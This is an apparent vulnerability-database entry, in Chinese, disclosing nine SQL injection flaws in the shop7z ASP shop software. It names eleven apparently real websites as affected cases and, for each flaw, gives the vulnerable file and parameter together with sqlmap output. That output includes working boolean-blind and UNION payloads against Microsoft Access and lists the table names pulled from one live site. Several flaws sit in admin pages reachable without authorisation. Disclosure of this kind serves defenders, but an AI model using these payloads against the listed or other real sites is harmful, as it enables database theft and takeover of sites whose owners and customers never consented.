|shop7z九处SQL注入打包 - VULHUB开源网络安全威胁库

shop7z九处SQL注入打包

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： shop7z九处SQL注入打包提交好几次了虽然很累不过想到审核的哥们要审核那么多洞自己的累确实不算什么 ### 详细说明：案例： http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn #1 漏洞文件：/admin/dingdan_sendnot.asp 问题参数：id【POST下】 TEST：http://www.125309.com/admin/dingdan_sendnot.asp ``` id=1 ``` ``` Place: POST Parameter: id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: id=IIF(2159=2159,1,1/0) --- [19:37:57] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb' [19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_maste rdb' [19:37:57] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [19:37:57] [INFO] retrieved: [19:37:58] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [19:37:58] [WARNING] unable to retrieve the number of tables for database 'Micro soft_Access_masterdb' [19:37:58] [ERROR] cannot retrieve table names, back-end DBMS is Access do you want to use common table existence check? [Y/n/q] y [19:38:01] [INFO] checking table existence using items from 'D:\python\sqlmap\tx t\common-tables.txt' [19:38:01] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] 9 [19:38:01] [INFO] starting 9 threads [19:38:06] [INFO] retrieved: admin [19:38:23] [INFO] retrieved: article [19:40:37] [INFO] retrieved: ad [19:41:05] [INFO] retrieved: message Database: Microsoft_Access_masterdb [4 tables] +---------+ | ad | | admin | | article | | message | +---------+ ``` #2 漏洞文件：/admin/lipindel.asp【存在越权】问题参数：id TEST：http://www.125309.com/admin/lipindel.asp?id=1 ``` Place: GET Parameter: id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: id=IIF(1449=1449,1,1/0) --- [19:46:56] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:46:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:46:56 ``` #3 漏洞文件：/show.asp?tk=shop7z 问题参数：pkid【POST下】 TEST:http://www.125309.com/show.asp?tk=shop7z ``` pkid=1 ``` ``` Place: POST Parameter: pkid Type: UNION query Title: Generic UNION query (NULL) - 38 columns Payload: pkid=-2466 UNION ALL SELECT CHR(58)&CHR(120)&CHR(108)&CHR(112)&CHR( 58)&CHR(111)&CHR(71)&CHR(69)&CHR(101)&CHR(89)&CHR(81)&CHR(101)&CHR(74)&CHR(104)& CHR(110)&CHR(58)&CHR(99)&CHR(106)&CHR(99)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00 --- [19:48:36] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:48:36] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:48:36 ``` #4 漏洞文件：orderpro_del.asp 问题参数：id TEST:http://www.125309.com/orderpro_del.asp?id=1 ``` Place: GET Parameter: id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: id=IIF(2623=2623,1,1/0) --- [19:50:23] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft Access [19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:50:23 ``` #5 漏洞文件：show_foot.asp 问题参数：c_id TEST：http://www.125309.com/show_foot.asp?c_id=1 ``` Place: GET Parameter: c_id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: c_id=IIF(3932=3932,1,1/0) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: c_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(104)&CHR(11 5)&CHR(121)&CHR(58)&CHR(115)&CHR(90)&CHR(101)&CHR(90)&CHR(89)&CHR(79)&CHR(67)&CH R(102)&CHR(120)&CHR(119)&CHR(58)&CHR(102)&CHR(113)&CHR(107)&CHR(58),NULL,NULL,NU LL,NULL,NULL,NULL FROM MSysAccessObjects%00 --- [19:51:54] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:51:55] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:51:55 ``` #6 漏洞文件：showone.asp 问题参数：l_id TEST:http://www.125309.com/showone.asp?l_id=1 ``` Place: GET Parameter: l_id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: l_id=IIF(9827=9827,1,1/0) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: l_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(122)&CHR(10 2)&CHR(104)&CHR(58)&CHR(113)&CHR(87)&CHR(69)&CHR(120)&CHR(108)&CHR(79)&CHR(88)&C HR(86)&CHR(109)&CHR(116)&CHR(58)&CHR(106)&CHR(116)&CHR(122)&CHR(58),NULL,NULL,NU LL,NULL,NULL,NULL FROM MSysAccessObjects%00 --- [19:53:38] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:53:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:53:38 ``` #7 漏洞文件：/admin/dingdan_detail.asp【存在越权】问题参数：id TEST:http://www.125309.com/admin/dingdan_detail.asp?id=1 ``` Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9606=9606 --- [19:54:50] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:54:50] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:54:50 ``` ### 漏洞证明： #8 漏洞文件：/admin/chongzhimodify.asp【存在越权】问题参数：id【POST下】 TEST:http://www.125309.com/admin/chongzhimodify.asp ``` id=1 ``` ``` Place: POST Parameter: id Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original va lue) Payload: id=IIF(3785=3785,1,1/0) --- [19:58:56] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [19:58:56] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 85 times [19:58:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp ut\www.125309.com' [*] shutting down at 19:58:56 ``` 还有处不确定不过应该是注入 #9 漏洞文件：/admin/zhfbili.asp【存在越权】问题参数：zhfbili【POST下】 TEST:http://www.125309.com/admin/zhfbili.asp ``` zhfbili=1'&Submit=+%B1%A3%B4%E6+&ok=1 ``` ``` Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式 ''1''' 中。 /admin/zhfbili.asp，行 77 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™